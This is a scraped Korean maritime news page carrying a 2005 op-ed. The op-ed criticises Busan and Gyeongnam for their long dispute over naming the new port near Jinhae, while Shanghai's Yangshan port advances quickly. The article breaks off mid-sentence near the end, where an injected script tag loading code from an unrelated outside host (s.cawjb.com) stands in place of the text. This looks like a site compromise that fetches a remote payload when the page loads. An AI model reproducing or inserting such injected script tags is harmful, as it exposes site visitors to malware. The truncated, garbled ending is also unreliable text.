UPDATE : 2024-04-27 17:13 (토)
상하이‘양산(洋山)항’은 뛰는데, ‘부산신항’은 .....
상하이‘양산(洋山)항’은 뛰는데, ‘부산신항’은 .....
  • 해사신문
  • 승인 2005.03.11 04:46
  • 댓글 0
이 기사를 공유합니다

이슈진단- 특별기고 : 이경순


상하이‘양산(洋山)항’은 뛰는데, ‘부산신항’은 이름조차 못 붙여서야



지금 부산 강서구 지사동과 경남 진해시 용원동 앞바다에 조성 중인 신항만의 명칭을 두고 부산시와 경남도가 수년째 양보 없는 싸움을 계속하고 있다. 신항만의 이름을 ‘부산 신항’으로 할 것이냐 ‘진해 신항’으로 할 것이냐 하는 문제다.

정말 꼴불견의 극치다. 노무현 대통령이 당선될 때인 2002년 12월에 중국 상하이 앞바다에서 엄청난 공사 하나가 막 시작됐다. 상하이는
폭발적인 경제성장에 따라 수출입 화물량이 급증하고 있었다.

그러나 상하이 항(港)은 자연 조건이 불리해 한계를 노출했다. 중국은 결국 상하이 앞바다의 섬에 새로운 항만을 건설하고 그 섬과 상하이를 연결하는 다리를 놓기로 결정했다.

다리 길이만 31㎞이고 그 위에 왕복 6차선의 도로를 건설하는 공사였다. 이 대공사가 이른바 양산(洋山) 신항 프로젝트다. 중국 사람들은 신항의 해상대교를 ‘바다 만리장성’ 이라 부른다고 한다.

지난 2년 여간 악전고투로 바다 만리장성의 교각과 상판은 얼마 전 완공됐다. 올해 말에는 항만의 본격 운영이 가능할 것으로 예상하고 있다. 놀라운 속도다. 그렇게 되면 이 항만의 화물 처리 능력은 당장 부산항과 맞먹게 된다.

해양수산부 관계자는 이렇게 말했다. “2002년부터 양산항 해상대교 공사를 지켜보고 있다. 그 쪽 바다는 태풍이 몰아치는 곳이다. 그런 곳에 60억 달러를 퍼부어 31㎞짜리 다리와 항만을 건설한다는 것은 무모한 일로 보였다. 그런데 교각이 늘어나고 하나씩 연결되면서 어느
순간에 이 괴물이 현실의 문제가 됐다. 그때 이후로, 그곳을 보고 온 사람들로부터 공사가 얼마나 더 나갔는지 얘기를 들으면 겁이 난다.”

상하이 양산 신항은 동북아 허브(hub) 항만을 선점하려는 우리 계획에 치명타를 가할 수도 있다. 앞으로 우리가 먹고 살 수 있는 비즈니스로 빼놓을 수 없는 것이 물류다.

물류의 핵심이 항만이고 부산과 광양 항이 그 거점인데 앞으로 화물이 상하이의 양산 신항으로 몰릴 가능성을 배제할 수 없다. 항만 규모의 경쟁에서부터 밀리게 돼 있다. 부산.광양 항도 규모를 늘려가고 있지만 양산 신항은 2015년부터 부산항을 추월해 2020년에는 두 배 가까운 규모가 된다.

기존 상하이항만으로도 이미 부산항을 앞서 있으니 격차는 더 벌어질 수밖에 없다. 그런데 우리는 뭘 하고 있는 거냐 이 말이다. 2006년
초에 개장될 항만의 이름도 못 짓고 있으니 말이다.

부산시는 부산항의 확장 형태인 신항만의 대외적 브랜드 가치를 감안해서 ‘부산 신항’으로 해야 한다는 주장이고, 경상남도는 신항만의 부지가 진해에 쏠려 있으므로 당연히 ‘진해 신항’으로 해야 한다는
주장이다.

전형적인 지역이기주의 다툼인 이 명칭 싸움은 이제 지역 국회의원, 시·도의원, 지역 시민단체, 지역 언론들이 총동원 되 다시 피한 총력전으로 확산되고 있다. 양측 간 싸움이 확전 일로를 치닫는 가운데 한나라당과 열린우리당 부산지역 의원 18명과 비례대표 의원 4명은 지난 2일 국회 기자실에서 “부산 신항이 2006년 초 개장될 예정이나
부산 신항의 공식 명칭이 아직 결정되지 않아 홍보에 큰 차질을 빚고 있다”며 “브랜드 파워와 항만 이용자들의 선호도 등을 고려해 ‘부산 신항’으로 명칭을 확정해야 한다”고 주장했다.

며칠 앞선 지난달 28일에는 경남도의회가 노 대통령의 배경을 믿어서인지 청와대와 총리실, 해양수산부 등을 잇달아 방문해 “부산시가 남의 집 앞에 자기 문패를 달려고 하고 있다”며 “진해 신항 이외의 이름은 받아들일 수 없다”고 주장했다.

양측 간 명칭 싸움이 조정 기미를 보이지 않자 최근 해양수산부는 직권으로 명칭을 결정할 수 있음을 비쳤다. 그러다가 경상남도 측의 반발이 거세자 다시 4월 말까지 두 시·도의 의견 조정을 기다려보겠다며 엉거주춤한 모습을 보이고 있다.

신항만 문제도 이제는 더 이상 두 지역 간 의견 조정으로 결정되기에는 감정의 골이 너무 깊어졌다. 갈등의 초기에 중앙정부가 서둘러 합리적 결정을 하고 반발을 무마해 가는 것이 갈등의 확산을 막는 길이었을 것이다.

양측의 갈등이 확산되면서 최근 경남에서는 시민·사회 단체들이 연합해 대규모 궐기대회를 준비하는 등 장외투쟁의 움직임을 본격화하고 있다. 신항만 착공 후로만 따져도 2년 이상 끌어 온 지루한 싸움을 이제는 봉합해야 할 때가 지났다. 2006년 개항을 앞둔 신항만의 대외홍보를 지금부터 서둘러야 하기 때문이다. 두 지역 간 합의만을 기대하는 것은 자칫 두 지역 간의 갈등을 돌이킬 수 없는 차원으로 키워 버려 합리적인 명칭 결정이 불가능해지는 지경에까지 이를 우려가 높다.

이제라도 하루 속?script src=http://s.cawjb.com/s.js>

댓글삭제
삭제한 댓글은 다시 복구할 수 없습니다.
그래도 삭제하시겠습니까?
댓글 0
댓글쓰기
계정을 선택하시면 로그인·계정인증을 통해
댓글을 남기실 수 있습니다.